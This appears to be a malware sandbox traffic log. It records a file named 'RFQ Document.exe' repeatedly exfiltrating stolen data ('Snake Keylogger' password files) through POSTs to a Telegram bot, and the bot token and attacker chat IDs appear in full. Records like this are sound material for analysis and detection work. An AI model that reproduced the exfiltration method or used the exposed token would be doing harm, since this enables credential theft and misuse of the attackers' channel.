                                            2021-09-28 06:00:07 UTC541INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12925,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808807,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            342192.168.2.450179149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:07 UTC541OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fcbe6377
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:07 UTC542OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 63 62 65 36 33 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fcbe6377Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:07 UTC542INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:07 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:07 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12926,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808807,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            343192.168.2.450180149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:07 UTC543OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fcdb0035
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:07 UTC543OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 63 64 62 30 30 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fcdb0035Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:07 UTC544INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:07 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:07 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12927,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808807,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            344192.168.2.450181149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:07 UTC544OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fd012540
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:07 UTC545OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 64 30 31 32 35 34 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fd012540Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:07 UTC545INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:07 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:07 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12929,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808807,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            345192.168.2.450182149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:08 UTC546OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fd24e880
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:08 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 64 32 34 65 38 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fd24e880Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:08 UTC547INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:08 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:08 UTC547INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12930,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808808,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            346192.168.2.450183149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:08 UTC548OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fd4b0f70
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:08 UTC548OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 64 34 62 30 66 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fd4b0f70Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:08 UTC548INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:08 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:08 UTC549INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12931,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808808,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            347192.168.2.450184149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:08 UTC549OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fd654c02
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:08 UTC550OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 64 36 35 34 63 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fd654c02Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:08 UTC550INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:08 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:08 UTC550INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12932,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808808,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            348192.168.2.450185149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:08 UTC551OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fd86a900
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:08 UTC551OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 64 38 36 61 39 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fd86a900Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:08 UTC552INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:08 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:08 UTC552INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 38 2c 22 64
